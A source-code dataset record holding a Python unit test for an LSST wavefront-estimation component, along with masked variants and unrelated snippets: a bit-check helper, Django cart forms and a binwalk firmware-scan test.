raInDegInWepCmpt, decInDegInWepCmpt = self.wepCmpt.getBoresight()
self.assertEqual(raInDegInWepCmpt, raInDeg)
self.assertEqual(decInDegInWepCmpt, decInDeg)
def testGetRotAng(self):
rotAngInDeg = self.wepCmpt.getRotAng()
self.assertEqual(rotAngInDeg, 0.0)
def testSetRotAng(self):
rotAngInDeg = 10.0
self.wepCmpt.setRotAng(rotAngInDeg)
self.assertEqual(self.wepCmpt.getRotAng(), rotAngInDeg)
def testIngestCalibs(self):
sensorNameList = ["R22_S11"]
fakeFlatDir = self._makeCalibs(self.outputDir, sensorNameList)
numOfFile = self._getNumOfFileInFolder(fakeFlatDir)
self.assertEqual(numOfFile, 6)
self.wepCmpt.ingestCalibs(fakeFlatDir)
numOfFile = self._getNumOfFileInFolder(fakeFlatDir)
self.assertEqual(numOfFile, 0)
def _makeCalibs(self, outputDir, sensorNameList):
fakeFlatDirName = "fake_flats"
fakeFlatDir = os.path.join(self.outputDir, fakeFlatDirName)
self._makeDir(fakeFlatDir)
detector = " ".join(sensorNameList)
self._genFakeFlat(fakeFlatDir, detector)
return fakeFlatDir
def _genFakeFlat(self, fakeFlatDir, detector):
currWorkDir = os.getcwd()
os.chdir(fakeFlatDir)
self._makeFakeFlat(detector)
os.chdir(currWorkDir)
def _makeFakeFlat(self, detector):
command = "makeGainImages.py"
argstring = "--detector_list %s" % detector
runProgram(command, argstring=argstring)
def _getNumOfFileInFolder(self, folder):
return len([name for name in os.listdir(folder)
if os.path.isfile(os.path.join(folder, name))])
def testGetSkyFile(self):
skyFile = self.wepCmpt.getSkyFile()
self.assertEqual(skyFile, "")
def testSetSkyFile(self):
skyFile = "testSetSkyFile"
self.wepCmpt.setSkyFile(skyFile)
self.assertEqual(self.wepCmpt.getSkyFile(), skyFile)
def testCalculateWavefrontErrorsComCam(self):
# Make the calibration products and do the ingestion
sensorNameList = ["R22_S11", "R22_S12"]
fakeFlatDir = self._makeCalibs(self.outputDir, sensorNameList)
self.wepCmpt.ingestCalibs(fakeFlatDir)
# Set the skyFile
repackagedDir = os.path.join(getModulePath(), "tests", "testData",
"comcamRepackagedData")
skyFilePath = os.path.join(repackagedDir, "skyComCamInfo.txt")
self.wepCmpt.setSkyFile(skyFilePath)
# Collect the wavefront data
intraRawExpData = RawExpData()
intraObsId = 9006002
intraRawExpDir = os.path.join(repackagedDir, "intra")
intraRawExpData.append(intraObsId, 0, intraRawExpDir)
extraRawExpData = RawExpData()
extraObsId = 9006001
extraRawExpDir = os.path.join(repackagedDir, "extra")
extraRawExpData.append(extraObsId, 0, extraRawExpDir)
# Calculate the wavefront error
wfErrMap = self.wepCmpt.calculateWavefrontErrorsComCam(intraRawExpData,
extraRawExpData)
self.assertEqual(len(wfErrMap), 2)
for wfErr in wfErrMap.values():
self.assertEqual(wfErr.argmax(), 1)
if __name__ == "__main__":
# Run the unit test
unittest.main()
|
normal
|
{
"blob_id": "6e434ff213166768a6adadf99dc5d6d8611fa2ba",
"index": 2762,
"step-1": "<mask token>\n\n\nclass TestWepCmpt(unittest.TestCase):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def testGetWepController(self):\n wepCntlr = self.wepCmpt.getWepController()\n self.assertTrue(isinstance(wepCntlr, WepController))\n <mask token>\n <mask token>\n\n def testGetBoresight(self):\n raInDeg, decInDeg = self.wepCmpt.getBoresight()\n self.assertEqual(raInDeg, 0.0)\n self.assertEqual(decInDeg, 0.0)\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def _makeCalibs(self, outputDir, sensorNameList):\n fakeFlatDirName = 'fake_flats'\n fakeFlatDir = os.path.join(self.outputDir, fakeFlatDirName)\n self._makeDir(fakeFlatDir)\n detector = ' '.join(sensorNameList)\n self._genFakeFlat(fakeFlatDir, detector)\n return fakeFlatDir\n <mask token>\n\n def _makeFakeFlat(self, detector):\n command = 'makeGainImages.py'\n argstring = '--detector_list %s' % detector\n runProgram(command, argstring=argstring)\n\n def _getNumOfFileInFolder(self, folder):\n return len([name for name in os.listdir(folder) if os.path.isfile(\n os.path.join(folder, name))])\n\n def testGetSkyFile(self):\n skyFile = self.wepCmpt.getSkyFile()\n self.assertEqual(skyFile, '')\n\n def testSetSkyFile(self):\n skyFile = 'testSetSkyFile'\n self.wepCmpt.setSkyFile(skyFile)\n self.assertEqual(self.wepCmpt.getSkyFile(), skyFile)\n\n def testCalculateWavefrontErrorsComCam(self):\n sensorNameList = ['R22_S11', 'R22_S12']\n fakeFlatDir = self._makeCalibs(self.outputDir, sensorNameList)\n self.wepCmpt.ingestCalibs(fakeFlatDir)\n repackagedDir = os.path.join(getModulePath(), 'tests', 'testData',\n 'comcamRepackagedData')\n skyFilePath = os.path.join(repackagedDir, 'skyComCamInfo.txt')\n self.wepCmpt.setSkyFile(skyFilePath)\n intraRawExpData = RawExpData()\n intraObsId = 9006002\n intraRawExpDir = os.path.join(repackagedDir, 'intra')\n intraRawExpData.append(intraObsId, 0, intraRawExpDir)\n extraRawExpData = RawExpData()\n extraObsId = 9006001\n extraRawExpDir = os.path.join(repackagedDir, 'extra')\n extraRawExpData.append(extraObsId, 0, extraRawExpDir)\n wfErrMap = self.wepCmpt.calculateWavefrontErrorsComCam(intraRawExpData,\n extraRawExpData)\n self.assertEqual(len(wfErrMap), 2)\n for wfErr in wfErrMap.values():\n self.assertEqual(wfErr.argmax(), 1)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass TestWepCmpt(unittest.TestCase):\n <mask token>\n <mask token>\n\n def _makeDir(self, newDir):\n os.makedirs(newDir, exist_ok=True)\n <mask token>\n\n def testGetWepController(self):\n wepCntlr = self.wepCmpt.getWepController()\n self.assertTrue(isinstance(wepCntlr, WepController))\n\n def testGetFilter(self):\n filterType = self.wepCmpt.getFilter()\n self.assertEqual(filterType, FilterType.REF)\n\n def testSetFilter(self):\n filterType = FilterType.R\n self.wepCmpt.setFilter(filterType)\n self.assertEqual(self.wepCmpt.getFilter(), filterType)\n\n def testGetBoresight(self):\n raInDeg, decInDeg = self.wepCmpt.getBoresight()\n self.assertEqual(raInDeg, 0.0)\n self.assertEqual(decInDeg, 0.0)\n\n def testSetBoresight(self):\n raInDeg = 10.0\n decInDeg = 20.0\n self.wepCmpt.setBoresight(raInDeg, decInDeg)\n raInDegInWepCmpt, decInDegInWepCmpt = self.wepCmpt.getBoresight()\n self.assertEqual(raInDegInWepCmpt, raInDeg)\n self.assertEqual(decInDegInWepCmpt, decInDeg)\n <mask token>\n <mask token>\n\n def testIngestCalibs(self):\n sensorNameList = ['R22_S11']\n fakeFlatDir = self._makeCalibs(self.outputDir, sensorNameList)\n numOfFile = self._getNumOfFileInFolder(fakeFlatDir)\n self.assertEqual(numOfFile, 6)\n self.wepCmpt.ingestCalibs(fakeFlatDir)\n numOfFile = self._getNumOfFileInFolder(fakeFlatDir)\n self.assertEqual(numOfFile, 0)\n\n def _makeCalibs(self, outputDir, sensorNameList):\n fakeFlatDirName = 'fake_flats'\n fakeFlatDir = os.path.join(self.outputDir, fakeFlatDirName)\n self._makeDir(fakeFlatDir)\n detector = ' '.join(sensorNameList)\n self._genFakeFlat(fakeFlatDir, detector)\n return fakeFlatDir\n <mask token>\n\n def _makeFakeFlat(self, detector):\n command = 'makeGainImages.py'\n argstring = '--detector_list %s' % detector\n runProgram(command, argstring=argstring)\n\n def _getNumOfFileInFolder(self, folder):\n return len([name for name in os.listdir(folder) if os.path.isfile(\n os.path.join(folder, name))])\n\n def testGetSkyFile(self):\n skyFile = self.wepCmpt.getSkyFile()\n self.assertEqual(skyFile, '')\n\n def testSetSkyFile(self):\n skyFile = 'testSetSkyFile'\n self.wepCmpt.setSkyFile(skyFile)\n self.assertEqual(self.wepCmpt.getSkyFile(), skyFile)\n\n def testCalculateWavefrontErrorsComCam(self):\n sensorNameList = ['R22_S11', 'R22_S12']\n fakeFlatDir = self._makeCalibs(self.outputDir, sensorNameList)\n self.wepCmpt.ingestCalibs(fakeFlatDir)\n repackagedDir = os.path.join(getModulePath(), 'tests', 'testData',\n 'comcamRepackagedData')\n skyFilePath = os.path.join(repackagedDir, 'skyComCamInfo.txt')\n self.wepCmpt.setSkyFile(skyFilePath)\n intraRawExpData = RawExpData()\n intraObsId = 9006002\n intraRawExpDir = os.path.join(repackagedDir, 'intra')\n intraRawExpData.append(intraObsId, 0, intraRawExpDir)\n extraRawExpData = RawExpData()\n extraObsId = 9006001\n extraRawExpDir = os.path.join(repackagedDir, 'extra')\n extraRawExpData.append(extraObsId, 0, extraRawExpDir)\n wfErrMap = self.wepCmpt.calculateWavefrontErrorsComCam(intraRawExpData,\n extraRawExpData)\n self.assertEqual(len(wfErrMap), 2)\n for wfErr in wfErrMap.values():\n self.assertEqual(wfErr.argmax(), 1)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass TestWepCmpt(unittest.TestCase):\n <mask token>\n <mask token>\n\n def _makeDir(self, newDir):\n os.makedirs(newDir, exist_ok=True)\n <mask token>\n\n def testGetWepController(self):\n wepCntlr = self.wepCmpt.getWepController()\n self.assertTrue(isinstance(wepCntlr, WepController))\n\n def testGetFilter(self):\n filterType = self.wepCmpt.getFilter()\n self.assertEqual(filterType, FilterType.REF)\n\n def testSetFilter(self):\n filterType = FilterType.R\n self.wepCmpt.setFilter(filterType)\n self.assertEqual(self.wepCmpt.getFilter(), filterType)\n\n def testGetBoresight(self):\n raInDeg, decInDeg = self.wepCmpt.getBoresight()\n self.assertEqual(raInDeg, 0.0)\n self.assertEqual(decInDeg, 0.0)\n\n def testSetBoresight(self):\n raInDeg = 10.0\n decInDeg = 20.0\n self.wepCmpt.setBoresight(raInDeg, decInDeg)\n raInDegInWepCmpt, decInDegInWepCmpt = self.wepCmpt.getBoresight()\n self.assertEqual(raInDegInWepCmpt, raInDeg)\n self.assertEqual(decInDegInWepCmpt, decInDeg)\n <mask token>\n\n def testSetRotAng(self):\n rotAngInDeg = 10.0\n self.wepCmpt.setRotAng(rotAngInDeg)\n self.assertEqual(self.wepCmpt.getRotAng(), rotAngInDeg)\n\n def testIngestCalibs(self):\n sensorNameList = ['R22_S11']\n fakeFlatDir = self._makeCalibs(self.outputDir, sensorNameList)\n numOfFile = self._getNumOfFileInFolder(fakeFlatDir)\n self.assertEqual(numOfFile, 6)\n self.wepCmpt.ingestCalibs(fakeFlatDir)\n numOfFile = self._getNumOfFileInFolder(fakeFlatDir)\n self.assertEqual(numOfFile, 0)\n\n def _makeCalibs(self, outputDir, sensorNameList):\n fakeFlatDirName = 'fake_flats'\n fakeFlatDir = os.path.join(self.outputDir, fakeFlatDirName)\n self._makeDir(fakeFlatDir)\n detector = ' '.join(sensorNameList)\n self._genFakeFlat(fakeFlatDir, detector)\n return fakeFlatDir\n\n def _genFakeFlat(self, fakeFlatDir, detector):\n currWorkDir = os.getcwd()\n os.chdir(fakeFlatDir)\n self._makeFakeFlat(detector)\n os.chdir(currWorkDir)\n\n def _makeFakeFlat(self, detector):\n command = 'makeGainImages.py'\n argstring = '--detector_list %s' % detector\n runProgram(command, argstring=argstring)\n\n def _getNumOfFileInFolder(self, folder):\n return len([name for name in os.listdir(folder) if os.path.isfile(\n os.path.join(folder, name))])\n\n def testGetSkyFile(self):\n skyFile = self.wepCmpt.getSkyFile()\n self.assertEqual(skyFile, '')\n\n def testSetSkyFile(self):\n skyFile = 'testSetSkyFile'\n self.wepCmpt.setSkyFile(skyFile)\n self.assertEqual(self.wepCmpt.getSkyFile(), skyFile)\n\n def testCalculateWavefrontErrorsComCam(self):\n sensorNameList = ['R22_S11', 'R22_S12']\n fakeFlatDir = self._makeCalibs(self.outputDir, sensorNameList)\n self.wepCmpt.ingestCalibs(fakeFlatDir)\n repackagedDir = os.path.join(getModulePath(), 'tests', 'testData',\n 'comcamRepackagedData')\n skyFilePath = os.path.join(repackagedDir, 'skyComCamInfo.txt')\n self.wepCmpt.setSkyFile(skyFilePath)\n intraRawExpData = RawExpData()\n intraObsId = 9006002\n intraRawExpDir = os.path.join(repackagedDir, 'intra')\n intraRawExpData.append(intraObsId, 0, intraRawExpDir)\n extraRawExpData = RawExpData()\n extraObsId = 9006001\n extraRawExpDir = os.path.join(repackagedDir, 'extra')\n extraRawExpData.append(extraObsId, 0, extraRawExpDir)\n wfErrMap = self.wepCmpt.calculateWavefrontErrorsComCam(intraRawExpData,\n extraRawExpData)\n self.assertEqual(len(wfErrMap), 2)\n for wfErr in wfErrMap.values():\n self.assertEqual(wfErr.argmax(), 1)\n\n\n<mask token>\n",
"step-4": "import os\nimport shutil\nimport numpy as np\nimport unittest\nfrom lsst.ts.wep.Utility import FilterType, runProgram\nfrom lsst.ts.wep.WepController import WepController\nfrom lsst.ts.wep.ctrlIntf.RawExpData import RawExpData\nfrom lsst.ts.aoclcSim.Utility import getModulePath\nfrom lsst.ts.aoclcSim.WepCmpt import WepCmpt\n\n\nclass TestWepCmpt(unittest.TestCase):\n \"\"\" Test the WepCmpt class.\"\"\"\n\n def setUp(self):\n self.outputDir = os.path.join(getModulePath(), 'tests', 'tmp')\n self._makeDir(self.outputDir)\n isrDirName = 'input'\n isrDir = os.path.join(self.outputDir, isrDirName)\n self._makeDir(isrDir)\n self.wepCmpt = WepCmpt(isrDir)\n self.wepCmpt.setFilter(FilterType.REF)\n self.wepCmpt.setBoresight(0.0, 0.0)\n self.wepCmpt.setRotAng(0.0)\n\n def _makeDir(self, newDir):\n os.makedirs(newDir, exist_ok=True)\n\n def tearDown(self):\n self.wepCmpt.disconnect()\n shutil.rmtree(self.outputDir)\n\n def testGetWepController(self):\n wepCntlr = self.wepCmpt.getWepController()\n self.assertTrue(isinstance(wepCntlr, WepController))\n\n def testGetFilter(self):\n filterType = self.wepCmpt.getFilter()\n self.assertEqual(filterType, FilterType.REF)\n\n def testSetFilter(self):\n filterType = FilterType.R\n self.wepCmpt.setFilter(filterType)\n self.assertEqual(self.wepCmpt.getFilter(), filterType)\n\n def testGetBoresight(self):\n raInDeg, decInDeg = self.wepCmpt.getBoresight()\n self.assertEqual(raInDeg, 0.0)\n self.assertEqual(decInDeg, 0.0)\n\n def testSetBoresight(self):\n raInDeg = 10.0\n decInDeg = 20.0\n self.wepCmpt.setBoresight(raInDeg, decInDeg)\n raInDegInWepCmpt, decInDegInWepCmpt = self.wepCmpt.getBoresight()\n self.assertEqual(raInDegInWepCmpt, raInDeg)\n self.assertEqual(decInDegInWepCmpt, decInDeg)\n\n def testGetRotAng(self):\n rotAngInDeg = self.wepCmpt.getRotAng()\n self.assertEqual(rotAngInDeg, 0.0)\n\n def testSetRotAng(self):\n rotAngInDeg = 10.0\n self.wepCmpt.setRotAng(rotAngInDeg)\n self.assertEqual(self.wepCmpt.getRotAng(), rotAngInDeg)\n\n def testIngestCalibs(self):\n sensorNameList = ['R22_S11']\n fakeFlatDir = self._makeCalibs(self.outputDir, sensorNameList)\n numOfFile = self._getNumOfFileInFolder(fakeFlatDir)\n self.assertEqual(numOfFile, 6)\n self.wepCmpt.ingestCalibs(fakeFlatDir)\n numOfFile = self._getNumOfFileInFolder(fakeFlatDir)\n self.assertEqual(numOfFile, 0)\n\n def _makeCalibs(self, outputDir, sensorNameList):\n fakeFlatDirName = 'fake_flats'\n fakeFlatDir = os.path.join(self.outputDir, fakeFlatDirName)\n self._makeDir(fakeFlatDir)\n detector = ' '.join(sensorNameList)\n self._genFakeFlat(fakeFlatDir, detector)\n return fakeFlatDir\n\n def _genFakeFlat(self, fakeFlatDir, detector):\n currWorkDir = os.getcwd()\n os.chdir(fakeFlatDir)\n self._makeFakeFlat(detector)\n os.chdir(currWorkDir)\n\n def _makeFakeFlat(self, detector):\n command = 'makeGainImages.py'\n argstring = '--detector_list %s' % detector\n runProgram(command, argstring=argstring)\n\n def _getNumOfFileInFolder(self, folder):\n return len([name for name in os.listdir(folder) if os.path.isfile(\n os.path.join(folder, name))])\n\n def testGetSkyFile(self):\n skyFile = self.wepCmpt.getSkyFile()\n self.assertEqual(skyFile, '')\n\n def testSetSkyFile(self):\n skyFile = 'testSetSkyFile'\n self.wepCmpt.setSkyFile(skyFile)\n self.assertEqual(self.wepCmpt.getSkyFile(), skyFile)\n\n def testCalculateWavefrontErrorsComCam(self):\n sensorNameList = ['R22_S11', 'R22_S12']\n fakeFlatDir = self._makeCalibs(self.outputDir, sensorNameList)\n self.wepCmpt.ingestCalibs(fakeFlatDir)\n repackagedDir = os.path.join(getModulePath(), 'tests', 'testData',\n 'comcamRepackagedData')\n skyFilePath = os.path.join(repackagedDir, 'skyComCamInfo.txt')\n self.wepCmpt.setSkyFile(skyFilePath)\n intraRawExpData = RawExpData()\n intraObsId = 9006002\n intraRawExpDir = os.path.join(repackagedDir, 'intra')\n intraRawExpData.append(intraObsId, 0, intraRawExpDir)\n extraRawExpData = RawExpData()\n extraObsId = 9006001\n extraRawExpDir = os.path.join(repackagedDir, 'extra')\n extraRawExpData.append(extraObsId, 0, extraRawExpDir)\n wfErrMap = self.wepCmpt.calculateWavefrontErrorsComCam(intraRawExpData,\n extraRawExpData)\n self.assertEqual(len(wfErrMap), 2)\n for wfErr in wfErrMap.values():\n self.assertEqual(wfErr.argmax(), 1)\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-5": "import os\nimport shutil\nimport numpy as np\nimport unittest\n\nfrom lsst.ts.wep.Utility import FilterType, runProgram\nfrom lsst.ts.wep.WepController import WepController\nfrom lsst.ts.wep.ctrlIntf.RawExpData import RawExpData\n\nfrom lsst.ts.aoclcSim.Utility import getModulePath\nfrom lsst.ts.aoclcSim.WepCmpt import WepCmpt\n\n\nclass TestWepCmpt(unittest.TestCase):\n \"\"\" Test the WepCmpt class.\"\"\"\n\n def setUp(self):\n\n self.outputDir = os.path.join(getModulePath(), \"tests\", \"tmp\")\n self._makeDir(self.outputDir)\n\n isrDirName = \"input\"\n isrDir = os.path.join(self.outputDir, isrDirName)\n self._makeDir(isrDir)\n\n self.wepCmpt = WepCmpt(isrDir)\n\n # Set the survey paramters\n self.wepCmpt.setFilter(FilterType.REF)\n self.wepCmpt.setBoresight(0.0, 0.0)\n self.wepCmpt.setRotAng(0.0)\n\n def _makeDir(self, newDir):\n\n os.makedirs(newDir, exist_ok=True)\n\n def tearDown(self):\n\n self.wepCmpt.disconnect()\n shutil.rmtree(self.outputDir)\n\n def testGetWepController(self):\n\n wepCntlr = self.wepCmpt.getWepController()\n self.assertTrue(isinstance(wepCntlr, WepController))\n\n def testGetFilter(self):\n\n filterType = self.wepCmpt.getFilter()\n self.assertEqual(filterType, FilterType.REF)\n\n def testSetFilter(self):\n\n filterType = FilterType.R\n self.wepCmpt.setFilter(filterType)\n\n self.assertEqual(self.wepCmpt.getFilter(), filterType)\n\n def testGetBoresight(self):\n\n raInDeg, decInDeg = self.wepCmpt.getBoresight()\n self.assertEqual(raInDeg, 0.0)\n self.assertEqual(decInDeg, 0.0)\n\n def testSetBoresight(self):\n\n raInDeg = 10.0\n decInDeg = 20.0\n self.wepCmpt.setBoresight(raInDeg, decInDeg)\n\n raInDegInWepCmpt, decInDegInWepCmpt = self.wepCmpt.getBoresight()\n self.assertEqual(raInDegInWepCmpt, raInDeg)\n self.assertEqual(decInDegInWepCmpt, decInDeg)\n\n def testGetRotAng(self):\n\n rotAngInDeg = self.wepCmpt.getRotAng()\n self.assertEqual(rotAngInDeg, 0.0)\n\n def testSetRotAng(self):\n\n rotAngInDeg = 10.0\n self.wepCmpt.setRotAng(rotAngInDeg)\n\n self.assertEqual(self.wepCmpt.getRotAng(), rotAngInDeg)\n\n def testIngestCalibs(self):\n\n sensorNameList = [\"R22_S11\"]\n fakeFlatDir = self._makeCalibs(self.outputDir, sensorNameList)\n\n numOfFile = self._getNumOfFileInFolder(fakeFlatDir)\n self.assertEqual(numOfFile, 6)\n\n self.wepCmpt.ingestCalibs(fakeFlatDir)\n\n numOfFile = self._getNumOfFileInFolder(fakeFlatDir)\n self.assertEqual(numOfFile, 0)\n\n def _makeCalibs(self, outputDir, sensorNameList):\n\n fakeFlatDirName = \"fake_flats\"\n fakeFlatDir = os.path.join(self.outputDir, fakeFlatDirName)\n self._makeDir(fakeFlatDir)\n\n detector = \" \".join(sensorNameList)\n self._genFakeFlat(fakeFlatDir, detector)\n\n return fakeFlatDir\n\n def _genFakeFlat(self, fakeFlatDir, detector):\n\n currWorkDir = os.getcwd()\n\n os.chdir(fakeFlatDir)\n self._makeFakeFlat(detector)\n os.chdir(currWorkDir)\n\n def _makeFakeFlat(self, detector):\n\n command = \"makeGainImages.py\"\n argstring = \"--detector_list %s\" % detector\n runProgram(command, argstring=argstring)\n\n def _getNumOfFileInFolder(self, folder):\n\n return len([name for name in os.listdir(folder) \n if os.path.isfile(os.path.join(folder, name))])\n\n def testGetSkyFile(self):\n\n skyFile = self.wepCmpt.getSkyFile()\n self.assertEqual(skyFile, \"\")\n\n def testSetSkyFile(self):\n\n skyFile = \"testSetSkyFile\"\n self.wepCmpt.setSkyFile(skyFile)\n\n self.assertEqual(self.wepCmpt.getSkyFile(), skyFile)\n\n def testCalculateWavefrontErrorsComCam(self):\n\n # Make the calibration products and do the ingestion\n sensorNameList = [\"R22_S11\", \"R22_S12\"]\n fakeFlatDir = self._makeCalibs(self.outputDir, sensorNameList)\n self.wepCmpt.ingestCalibs(fakeFlatDir)\n\n # Set the skyFile\n repackagedDir = os.path.join(getModulePath(), \"tests\", \"testData\",\n \"comcamRepackagedData\")\n skyFilePath = os.path.join(repackagedDir, \"skyComCamInfo.txt\")\n self.wepCmpt.setSkyFile(skyFilePath)\n\n # Collect the wavefront data\n intraRawExpData = RawExpData()\n intraObsId = 9006002\n intraRawExpDir = os.path.join(repackagedDir, \"intra\")\n intraRawExpData.append(intraObsId, 0, intraRawExpDir)\n\n extraRawExpData = RawExpData()\n extraObsId = 9006001\n extraRawExpDir = os.path.join(repackagedDir, \"extra\")\n extraRawExpData.append(extraObsId, 0, extraRawExpDir)\n\n # Calculate the wavefront error\n wfErrMap = self.wepCmpt.calculateWavefrontErrorsComCam(intraRawExpData,\n extraRawExpData)\n\n self.assertEqual(len(wfErrMap), 2)\n for wfErr in wfErrMap.values():\n self.assertEqual(wfErr.argmax(), 1)\n\n\nif __name__ == \"__main__\":\n\n # Run the unit test\n unittest.main()\n",
"step-ids": [
9,
14,
16,
22,
23
]
}
|
[
9,
14,
16,
22,
23
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def check_bit4(input):
mas = 8
desired = input & mas
if desired > 0:
return 'om'
else:
return 'off'
<|reserved_special_token_1|>
def check_bit4(input):
mas=0b1000
desired=input & mas
if desired>0:
return "om"
else :
return "off"
|
flexible
|
{
"blob_id": "29dc940292a6805aabfa5bed22bb75d31140c83f",
"index": 3257,
"step-1": "<mask token>\n",
"step-2": "def check_bit4(input):\n mas = 8\n desired = input & mas\n if desired > 0:\n return 'om'\n else:\n return 'off'\n",
"step-3": "def check_bit4(input):\n\tmas=0b1000\n\tdesired=input & mas\n\tif desired>0:\n\t\treturn \"om\"\n\telse :\n\t\treturn \"off\"\n\n\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
from django import forms
class RemoveProdutoDoCarrinhoForm(forms.Form):
class Meta:
fields = ('produto_id')
produto_id = forms.CharField(widget=forms.HiddenInput())
class QuantidadeForm(forms.Form):
class Meta:
fields = ('quantidade', 'produto_id')
# <input type="hidden" name="produto_id" id="id_produto_id" value="xxx">
produto_id = forms.CharField(widget=forms.HiddenInput())
quantidade = forms.IntegerField(
min_value=1,
max_value=1000,
error_messages={'required': 'Campo obrigatório.', },
widget=forms.TextInput(attrs={'class': 'form-control form-control-sm quantidade',
'maxlength': '20',
'onkeypress': 'return event.charCode >= 48 && event.charCode <= 57'}),
required=True)
|
normal
|
{
"blob_id": "fd5fca0e9abbb669ddff4d676147acc4344cdd1c",
"index": 509,
"step-1": "<mask token>\n\n\nclass QuantidadeForm(forms.Form):\n\n\n class Meta:\n fields = 'quantidade', 'produto_id'\n produto_id = forms.CharField(widget=forms.HiddenInput())\n quantidade = forms.IntegerField(min_value=1, max_value=1000,\n error_messages={'required': 'Campo obrigatório.'}, widget=forms.\n TextInput(attrs={'class': 'form-control form-control-sm quantidade',\n 'maxlength': '20', 'onkeypress':\n 'return event.charCode >= 48 && event.charCode <= 57'}), required=True)\n",
"step-2": "<mask token>\n\n\nclass RemoveProdutoDoCarrinhoForm(forms.Form):\n\n\n class Meta:\n fields = 'produto_id'\n <mask token>\n\n\nclass QuantidadeForm(forms.Form):\n\n\n class Meta:\n fields = 'quantidade', 'produto_id'\n produto_id = forms.CharField(widget=forms.HiddenInput())\n quantidade = forms.IntegerField(min_value=1, max_value=1000,\n error_messages={'required': 'Campo obrigatório.'}, widget=forms.\n TextInput(attrs={'class': 'form-control form-control-sm quantidade',\n 'maxlength': '20', 'onkeypress':\n 'return event.charCode >= 48 && event.charCode <= 57'}), required=True)\n",
"step-3": "<mask token>\n\n\nclass RemoveProdutoDoCarrinhoForm(forms.Form):\n\n\n class Meta:\n fields = 'produto_id'\n produto_id = forms.CharField(widget=forms.HiddenInput())\n\n\nclass QuantidadeForm(forms.Form):\n\n\n class Meta:\n fields = 'quantidade', 'produto_id'\n produto_id = forms.CharField(widget=forms.HiddenInput())\n quantidade = forms.IntegerField(min_value=1, max_value=1000,\n error_messages={'required': 'Campo obrigatório.'}, widget=forms.\n TextInput(attrs={'class': 'form-control form-control-sm quantidade',\n 'maxlength': '20', 'onkeypress':\n 'return event.charCode >= 48 && event.charCode <= 57'}), required=True)\n",
"step-4": "from django import forms\n\n\nclass RemoveProdutoDoCarrinhoForm(forms.Form):\n\n\n class Meta:\n fields = 'produto_id'\n produto_id = forms.CharField(widget=forms.HiddenInput())\n\n\nclass QuantidadeForm(forms.Form):\n\n\n class Meta:\n fields = 'quantidade', 'produto_id'\n produto_id = forms.CharField(widget=forms.HiddenInput())\n quantidade = forms.IntegerField(min_value=1, max_value=1000,\n error_messages={'required': 'Campo obrigatório.'}, widget=forms.\n TextInput(attrs={'class': 'form-control form-control-sm quantidade',\n 'maxlength': '20', 'onkeypress':\n 'return event.charCode >= 48 && event.charCode <= 57'}), required=True)\n",
"step-5": "from django import forms\n\nclass RemoveProdutoDoCarrinhoForm(forms.Form):\n class Meta:\n fields = ('produto_id')\n\n produto_id = forms.CharField(widget=forms.HiddenInput())\n\nclass QuantidadeForm(forms.Form):\n class Meta:\n fields = ('quantidade', 'produto_id')\n\n # <input type=\"hidden\" name=\"produto_id\" id=\"id_produto_id\" value=\"xxx\">\n produto_id = forms.CharField(widget=forms.HiddenInput())\n\n quantidade = forms.IntegerField(\n min_value=1,\n max_value=1000,\n error_messages={'required': 'Campo obrigatório.', },\n widget=forms.TextInput(attrs={'class': 'form-control form-control-sm quantidade',\n 'maxlength': '20',\n 'onkeypress': 'return event.charCode >= 48 && event.charCode <= 57'}),\n required=True)\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
from os.path import dirname
import binwalk
from nose.tools import eq_, ok_
def test_firmware_squashfs():
'''
Test: Open hello-world.srec, scan for signatures
verify that only one signature is returned
verify that the only signature returned is Motorola S-rec data-signature
'''
expected_results = [
[0, 'DLOB firmware header, boot partition: "dev=/dev/mtdblock/2"'],
[112, 'LZMA compressed data, properties: 0x5D, dictionary size: 33554432 bytes, uncompressed size: 3466208 bytes'],
[1179760, 'PackImg section delimiter tag, little endian size: 11548416 bytes; big endian size: 3649536 bytes'],
[1179792, 'Squashfs filesystem, little endian, version 4.0, compression:lzma, size: 3647665 bytes, 1811 inodes, blocksize: 524288 bytes, created: 2013-09-17 06:43:22'],
]
scan_result = binwalk.scan(
dirname(__file__) + '/input-vectors/firmware.squashfs',
signature=True,
quiet=True,
extract=True) # Throws a warning for missing external extractor
# Test number of modules used
eq_(len(scan_result), 1)
# Test number of results for that module
eq_(len(scan_result[0].results), len(expected_results))
# Test result-description
for i in range(0, len(scan_result[0].results)):
eq_(scan_result[0].results[i].offset, expected_results[i][0])
eq_(scan_result[0].results[i].description, expected_results[i][1])
|
normal
|
{
"blob_id": "d55043c2a18b935478d9be442aaf7305231edc7d",
"index": 5828,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef test_firmware_squashfs():\n \"\"\"\n Test: Open hello-world.srec, scan for signatures\n verify that only one signature is returned\n verify that the only signature returned is Motorola S-rec data-signature\n \"\"\"\n expected_results = [[0,\n 'DLOB firmware header, boot partition: \"dev=/dev/mtdblock/2\"'], [\n 112,\n 'LZMA compressed data, properties: 0x5D, dictionary size: 33554432 bytes, uncompressed size: 3466208 bytes'\n ], [1179760,\n 'PackImg section delimiter tag, little endian size: 11548416 bytes; big endian size: 3649536 bytes'\n ], [1179792,\n 'Squashfs filesystem, little endian, version 4.0, compression:lzma, size: 3647665 bytes, 1811 inodes, blocksize: 524288 bytes, created: 2013-09-17 06:43:22'\n ]]\n scan_result = binwalk.scan(dirname(__file__) +\n '/input-vectors/firmware.squashfs', signature=True, quiet=True,\n extract=True)\n eq_(len(scan_result), 1)\n eq_(len(scan_result[0].results), len(expected_results))\n for i in range(0, len(scan_result[0].results)):\n eq_(scan_result[0].results[i].offset, expected_results[i][0])\n eq_(scan_result[0].results[i].description, expected_results[i][1])\n",
